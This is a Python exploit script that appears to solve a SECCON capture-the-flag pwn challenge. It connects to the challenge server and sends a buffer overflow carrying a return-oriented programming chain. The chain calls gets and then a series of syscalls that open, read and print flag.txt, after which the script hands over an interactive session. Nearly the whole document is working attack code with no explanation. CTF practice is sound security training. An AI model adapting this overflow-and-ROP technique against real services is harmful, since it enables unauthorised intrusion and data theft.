#!/usr/bin/python
import struct
import socket
import telnetlib

def readuntil(f, delim=': '):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data

def p(v):
    return struct.pack('>I', v)

def u(v):
    return struct.unpack('>I', v)[0]

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('micro.pwn.seccon.jp', 10000))
f = s.makefile('rw', bufsize=0)
readuntil(f)


'''
.text:0000424C mov.l   @r15+, r7       ; Move Long Data
.text:0000424E mov.l   @r15+, r6       ; Move Long Data
.text:00004250 mov.l   @r15+, r5       ; Move Long Data
.text:00004252 mov.l   @r15+, r4       ; Move Long Data
.text:00004254 lds.l   @r15+, pr       ; Load to System Register Long
.text:00004256 rts                     ; Return from Subroutine
.text:00004258 mov.l   @r15+, r8       ; Move Long Data
'''
pop_7654 = 0x424c
main = 0x428C
data = 0x00FFA000
gets = 0x4200 + 2
syscall = 0x4028

payload = 'A' * 0x10
payload += p(pop_7654)
payload += 'AAAA'
payload += p(0)
payload += p(0)
payload += p(0)
payload += p(data)
payload += p(gets)
payload += 'AAAA'

payload += p(pop_7654)
payload += p(0)
payload += p(0)
payload += p(data)
payload += p(5)
payload += p(syscall)
payload += 'AAAA'

payload += p(pop_7654)
payload += p(64)
payload += p(data)
payload += p(3)
payload += p(3)
payload += p(syscall)
payload += 'AAAA'

payload += p(pop_7654)
payload += p(64)
payload += p(data)
payload += p(1)
payload += p(4)
payload += p(syscall)
payload += 'AAAA'

payload += p(0x41414141)

f.write(payload + '\n')
f.write('flag.txt\0\n')

t = telnetlib.Telnet()
t.sock = s
t.interact()